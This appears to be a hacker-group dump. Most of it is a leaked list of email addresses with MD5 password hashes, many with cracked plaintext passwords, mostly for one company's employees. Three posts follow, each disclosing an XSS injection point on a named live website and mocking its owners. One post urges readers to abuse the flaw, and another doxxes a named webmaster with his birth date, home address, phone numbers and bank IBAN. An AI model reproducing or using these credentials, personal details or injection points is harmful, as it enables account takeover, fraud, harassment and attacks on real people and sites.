dmccullough@fairbanks.com,1d5ce550865a678ba825443bbca9f4e1 (knight5),DMcCullough
jrodgers@fairbanks.com,5927394ea5c7e8451c52b39dbb6f9629,RJohnny
vkeune@fairbanks.com,936b0d20ea139818149a9a646e836b61,vkeune
dtimmons@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),dtimmons
bfinley@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,bfinley
gdowns@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),GDowns
tcollins@fairbanks.com,d6b8fca7c3a132c58c6954d906a6dd6c,tcollins
bdaniel@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,bdaniel
jnewkoop@fairbanks.com,CCF3819E0EC3939CB23AA5988BF033B2 (Blizzard),jnewkoop
twaicosky@fairbanks.com,CFC250743EDE8B3F8A98F2BFB6474B8B (eileen101),twaicosky
ilariam@dinamicagenerale.com,e10adc3949ba59abbe56e057f20f883e (123456),ilariam
nicola@dinamicagenerale.com,e10adc3949ba59abbe56e057f20f883e (123456),nicola
sanderson@fairbanks.com,03accf47297663bbd54cf01f4cdb2035 (bright1),SAnderson
mnolan@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,mnolan
mroberts@fairbanks.com,AB58F0F02A687EA88B556BD0750982BC,mroberts
jo’brien@fairbanks.com,00F2AC3EB755B1F04C005AAD89388630,jo’brien
aspeed@fairbanks.com,EF4CDD3117793B9FD593D7488409626D (harley),aspeed
mmadrid@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),mmadrid
tjohnson@fairbanks.com,C5F116B94EE34AB8CDF4DCAC9FAAA31E,tjohnson
ariedel@fairbanks.com,e10adc3949ba59abbe56e057f20f883e (123456),ariedel
randrews@fairbanks.com,AEE29A47B41E6EC5D352B1A515C37E82 (Optical),randrews
buffalo@fairbanks.com,41c02b8369fa0a2400e5fb31730bb344,gpruski
pmills@fairbanks.com,8F14E45FCEEA167A5A36DEDD4BEA2543 (7),pmills
pwilliams@fairbanks.com,464E1E40CA8748F37B5A56BAAAA22DE6,pwilliams
jnelson@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),jnelson
jvaquerano@fairbanks.com,FFFEF34C36D12662DFF4C998A82978CE,jvaquerano
bcunningham@fairbanks.com,C5568281674673D2552ED8A21BFB9578 (tanner05),bcunningham
aceja@fairbanks.com,BC366F2D0BA3D681E7A3899917C5D3DE,aceja
spapineau@fairbanks.com,B420C1D31E69A823FBC30A434907C9C0,spapineau
dtaylor-closed@fairbanks.com,B309DB4F292A09A33EAE06278602742D,ctaylor
bgriffith@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,bgriffith
mbarnes@fairbanks.com,5874C47265F75018AFDADF2D4A326344 (Shotgun),mbarnes
jkuykendall-inactive@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),jkuykendall
ebaker@fairbanks.com,9CBA8CB5F32AAD24C55CADC6E4AF3019,ebaker
cgrott@fairbanks.com,A70CB2632634BDC24D3E6CCA61B1161D,cgrott
babsher@fairbanks.com,D51DD20CA05FFAB454C79020D535E5B3,babsher
mheeter@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),mheeter
gwenell@fairbanks.com,B875A17F3968F27694FA5266C7F68CE5,gwenell
tclark@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),tclark
mwilliams@fairbanks.com,81dc9bdb52d04dc20036dbd8313ed055 (1234),MWilliams
dbarbercheck@fairbanks.com,3C18971605B1367C3D2ED6FDA74BE164 (Champion),dbarbercheck
tdonley@fairbanks.com,7066A8E86E8F36D8C5E99B2192DD1304,tdonley
jcoon@fairbanks.com,F59BD65F7EDAFB087A81D4DCA06C4910,jcoon
mcurran@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),MCurran
msmith@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),MSmith
mmason@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),MMason
bwilliams@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),BWilliams
bgrindstaff@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),BGrindstaff
tluke@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),TLuke
bjozwiak@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),BJozwiak
swurtzler@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),SWurtzler
dhebenstreit@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),DHebenstreit
econrad@fairbanks.com,23B621240E3DD8B7E3D676B421E2D241,econrad
tkinter@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),TKinter
wlumsden@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),WLumsden
cnelson@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),CNelson
lmurphy@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),LMurphy
cmardis@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),CMardis
nationalaccounts@fairbanks.com,1999D215FCA7F3428EC2026E6ADB5EB1,naccounts
jmoore2@fairbanks.com,752C436FB0F9241768F3D86B80300EF6,jmoore2
bbasha@fairbanks.com,268A3D634A40C18EEACE68598AE9676A,bbasha
cschenk@fairbanks.com,1F4C81A04A4EA265E4D368D387243F96,cschenk
cbunnell@fairbanks.com,F59BD65F7EDAFB087A81D4DCA06C4910,cbunnell
jbouvet@fairbanks.com,AA28A7586C39B2A108E45CCDD274A0FB,jbouvet
rwest@fairbanks.com,0C3F80A4A41D570C3F6064E74A059CCD,rwest
portland@fairbanks.com,F7467F6DF1A9E12A3B00EB0ADE10FA0F (austin11),kdally
zestrada@fairbanks.com,E9C2B2D234D9703F5E9654583A5203BE,zestrada
mbeen@fairbanks.com,CCC14705F7FD1D7698D537F4D81E9504,mbeen
ehood@fairbanks.com,4DC45DE10277AFEC956A8AE5C8DF7F4D,ehood
sblack@fairbanks.com,9AD9CD8D3DC239F2AA67CAE13D077C7B,sblack
crees@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),crees
ledwards-inactive@fairbanks.com,81DC9BDB52D04DC20036DBD8313ED055 (1234),ledwards
tkilgore@fairbanks.com,958DCDCC569B677E53F7F2595AEE8D3E,tkilgore
manuela@dinamicagenerale.com,e10adc3949ba59abbe56e057f20f883e (123456),manuela
phoenix@fairbanks.com,59B17EB7A500C361E5CC55A70B480045 (crochet),dskeldum
apartridge@fairbanks.com,AFABF27D9239DEBEAF91D8196FE7B711,apartridge
kkasperek@fairbanks.com,C9CDCB06301F9C79E2D20C2FDEDA0A02 (changeme123),kkasperek
rrodriguez@fairbanks.com,16A11E8B72F2BF2D786C19E98B473367,rrodriguez
charleys@pacific-scale.com,594B81EDC2BEAE811918EB3DBCC0DCD3,csever
bbreeden@fairbanks.com,CC1C24A26E7DC4324EFE663E66383D89,bbreeden
jcapstick@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),jcapstick
rlister@fairbanks.com,160CF97C50A81EE1AA43B722467C9E36,rlister
rrogers@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),rrogers
rgrove@fairbanks.com,E5BA07FF8E54228A4B1A9FE80FFE6B11,rgrove
mobile@fairbanks.com,7D0EC29BAC018CCB1E8F1D9D6E7F8CE0,dgreen
tweisgerber@fairbanks.com,789A3FE022DBA33176E1F977036B5401,tweisgerber
tuser@fairbanks.com,912EC803B2CE49E4A541068D495AB570 (asdf),tuser
mhovanec@fairbanks.com,12640C7B00DB3C4B29CC0B146C2BA346,mhovanec
rlucas@fairbanks.com,965C1331BE0AB4602B2B347A446FD7BE,rlucas
reaster@fairbanks.com,E3AF6EFF86B79F3E4B67649D1C3A79CA,reaster
skgietler@juno.com,0CB21044CE80975DA1FDFF3522EF979A (karensue123),kgietler
Lalcorn88@yahoo.com,B3A45830E14CE0D2CE5D2580EA08D950 (orange7),lalcorn
tamarhabeeb@hotmail.com,C703F21A79D8BA612C147C36971F5F84,thabeeb
monte_woolery@juno.com,72B09C07680542D63FD136A656C70060 (asshole1),mwoolery
D_shawnms@yahoo.com,CAB4E1CEE37D10CBBBAB4DBB3D57B4C9,rhall
rebapril28@aol.com,3895F42705FD325C4334FB46CFB3A46F (rebel1),bdavidson
primeeng@cyber.net.pk,6C41D1F4D535E81442420BFF05671A53,mabdullah
rfilbeck@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),rfilbeck
tiffmike@xanadoo.com,AEA191E6D055B3F527354C1DEF6D75D9,mkenton
jimcp31@myway.com,E322895A171459E1CA08A61229E8AC0D,jharmon
hustleman8832@yahoo.com,57AAF259D17FF7A9A062FA948F959DE9,dharlan
rlambalot@synagro.com,CEB2B0A114D859426FE5129A1A2C7D9E,rlambalot
jim@csbco.com,492114F6915A69AA3DD005AA4233EF51 (5587),jirwin
chicago@fairbanks.com,A9B268F14068BD5EB8A3130F42C0F704 (smiles),cgurak
paigilu@gmail.com,D0AE0579B1AF99DB268753F7CAAD3EBF,probinson
utags7@aol.com,2ABB685288AE0CAAEA448BF4303222B4,kthompson
taniamonte@gmail.com,24408CE3F09B31F9D3454EE6EA81BB63 (florida),tmonte
bobbousquet@gmail.com,8D08068CBFBD61EAE31E0C6AA4BDCEEC (jillian),rbousquet iii
betsy48@tampabay.rr.com,5895C3BE56164F8CA82982FC9080EBCC,emarkusen
jason.molinaro@yahoo.com,E99A18C428CB38D5F260853678922E03 (abc123),jmolinaro
melodiets@hotmail.com,7FFEA9499ACAEA9CE1B31E304AC4F1BF (hotshot),msanchez
losangeles@fairbanks.com,7029D0F9042F1012530A1A4C508E1E4E,lvan
jrahhal@fairbanks.com,3CC8F90851CB7A6D40A0A8E9EA10FDB3 (Gibson),jrahhal
RVOGEL8685@AOL.COM,00C83CAE368F603F8C877C27CB435B1E (buddy55),rvogel
mobile@fairbanks.com,1BED89626F3BED58F69D7E02C02ABDC6,mhunt
sharita.mabie@bannerhealth.com,3F219530626821B1B8B5E6220CF1DC5D,smabie
cybernot@gci.net,D55CA9244BABE9928446BFD02DFB0BE2,rkenmonth
drcomp75@aol.com,C956DB914E2C7D2B380D8775B0E3B112,dryberg
proyectos@fabatsa.com.mx,5BF73BC6C6E6775D472621264309A88B (6161),dsantos
tcolt@fairbanks.com,3676F51B73AA462AFB2A5BDA1887DFC2 (fingers2),tcolt
helmy_ps@yahoo.com,9A993917980A1319B27ACD7EAD4CD93B,mhelmy
gary@caudillandsons.com,F449DAEEA67C67BE8DB36063DA8FBAB4,gcaudill
bluewolfe@ak.net,5F553EAE0640B73DF514870E8D8EA8FC,rparzick
Amy.Anderson@bannerhealth.com,4D6AEEC44FF7746E08AB8821316A4F00,aanderson
tcholick@fairbanks.com,4A4BE27D15A87F8D79648AC729C2D178,tcholick
mwilkinson@fairbanks.com,2760C7B84D4BAD6B0B12D7C1A6C5E1A4 (lauren),mwilkinson
longboat52@comcast.net,37203F0EF82C870C36CD6F99E1FBFE4C (valhalla),bdillon
sg@sgsystems.com,E10ADC3949BA59ABBE56E057F20F883E (123456),sg
sieversheather@yahoo.com,3A2484A750D84A5714240E98B5C2BEA2,esievers
jhudgens@fairbanks.com,09CF94F00F6043380598D83702A51C2F,jhudgens
jreed@fairbanks.com,64E428BD596499D4466AD4EE2C41B3A4,jreed
clowery@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),clowery
rbolton@fairbanks.com,D42C9582C29B508647082C57FEF8B7A0,rbolton
ngarwood@fairbanks.com,5300A300A13C510948788C9E235C5292,ngarwood
rbriggs@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),rbriggs
cblackburn@fairbanks.com,515B1893C3AC595D54CD51D0EC42A0FC,cblackburn
aziegler@fairbanks.com,D5541BD8E106B15F5ABF230839A3C810,aziegler
rmcguinty@fairbanks.com,82BFE6E75027360D6F58BB936A26500A,rmcguinty
clewis@fairbanks.com,CF809D05A5D538272977456B6B23C406,clewis
mhappy@fairbanks.com,17D9600FA3019C3B4988148F56E8714D,mhappy
sbristol@fairbanks.com,E10ADC3949BA59ABBE56E057F20F883E (123456),SBristol
Service@csbco.com,E9260FEAEC4CD850BFC5FDA5C3723F9B,ahensley
zjunge@fairbanks.com,05926F64065AAFFC01F1BA7F4FB8712E,zjunge
scampagna@fairbanks.com,24FF36EAF5A09381D7A93801FB3858CF,scampagna
jhake@fairbanks.com,7E406D9D04D6F42906F79C3345E65C03,jhake
mschneiderhan@fairbanks.com,D2D54B41EED5E13D17D85E5161EC3967,mschneiderhan
jwerry@fairbanks.com,58E6A9FB2D262E46BA02792BCAF9F1E0,jwerry
ehaselton@fairbanks.com,24993EF4B453C7284C763D233A346D29,ehaselton
cobryant@fairbanks.com,D62278FC4FA3F2B6A3255FC55C048D6F,cobryant
mhayne@fairbanks.com,1F2276A33768E31FAC4CBA0E26CA8EC0,mhayne
rhenry@fairbanks.com,23030C937F825376FBB4B5E20E03D941,rhenry
dbonte@fairbanks.com,822BB32AD82AF820740561CB974E742B,dbonte
francisco.gomez@marcatel.com.mx,117735823FADAE51DB091C7D63E60EB0 (francisco),gfrancisco
tmmpp24@yahoo.com,1BF8D4A1ADF50220A65BCE168E2B1653,tmusgrave
p_xiong@hotmail.com,BED128365216C019988915ED3ADD75FB (passw0rd),pxiong
efaucher@fairbanks.com,EDE177CF10F5DBE29C868B18DEBE432E,efaucher

Enjoy :-)!

everybiddy.com XSS Vulnerability

Davy de Witte, @davydewitte likes to annoyingly advertise his website to people on Twitter. Even though the website everybiddy.com states that it’s in BETA, it still sucks coding-wise. Let this be a lesson to you foolish webmasters: NEVER advertise your website while there are bugs which hackers can take advantage of.

Davy De Witte

Meet Davy, a 30-year old Belgian webmaster. Desperately looking for visitors on Twitter. Davy lives in Waasmunster, Belgium and was born on the 21st of July in 1981. Yet owning several domain names, he still uses a hotmail account: davy_de_witte@hotmail.com. Feel free to send him some spam aswel like he does on Twitter.

Back to the subject: his website. Everybiddy.com, has a Cross-Site Scripting (XSS) vulnerability that exists in the search form. Perhaps his website contains even more vulnerabilities, but let’s not do that at this moment. Here are the details:

URL: http://www.everybiddy.com/en/list?form=search&c=&q=[XSS]

Method: GET

Parameter: q

PoC:

image

http://bit.ly/qAPcqL

Update:

According to a domain WHOIS, this should be his address:

  Nachtegaallaan 16
  Lokeren, 9160
  BELGIUM

And if that would be true, which we assume isn’t, this should be other information:

  tel  +32 479 852822
  fax +32 9 3361536
  belgianraceinvest@telenet.be
  Bank: 733-0173390-81
  IBAN: BE36 7330 1733 9081
  BIC: KREDBEBB
  BTW: BE 0861.773.932

Iamexpat.nl XSS Vulnerability

@IamExpat decided a Cross-Site Scripting (XSS) vulnerability would be acceptable for their website. It’s just so lovely when you don’t like a website and you can just
change it by injecting some magic HTML. The PoC with this one is something we haven’t showed you guys yet. We load the JS alert() within the onload of an iframe. Awesome innit?

URL: http://www.iamexpat.nl/full_text_index/search/q:[XSS]

Method: GET

Patameter: q

PoC:

image

http://bit.ly/op4llt

Bodum.com XSS Vulnerability

@_dvi reported it before (http://bit.ly/q6wlc6). Bodum.com’s crappy website. Look at the date it was posted. That’s 29th of April. What a shame. This is what we mean with “Keep those student coders off your boxes”… Seriously? If we could care less, we would’ve spiced this website up with a large middle-finger. Enjoy. Oh and remember, abuse it well, because apparently they don’t care about their website.

URL: http://www.bodum.com/nl/nl/search/?search_txt=[XSS]

Method: GET

Patameter: search_txt

PoC:

http://bit.ly/px5NYX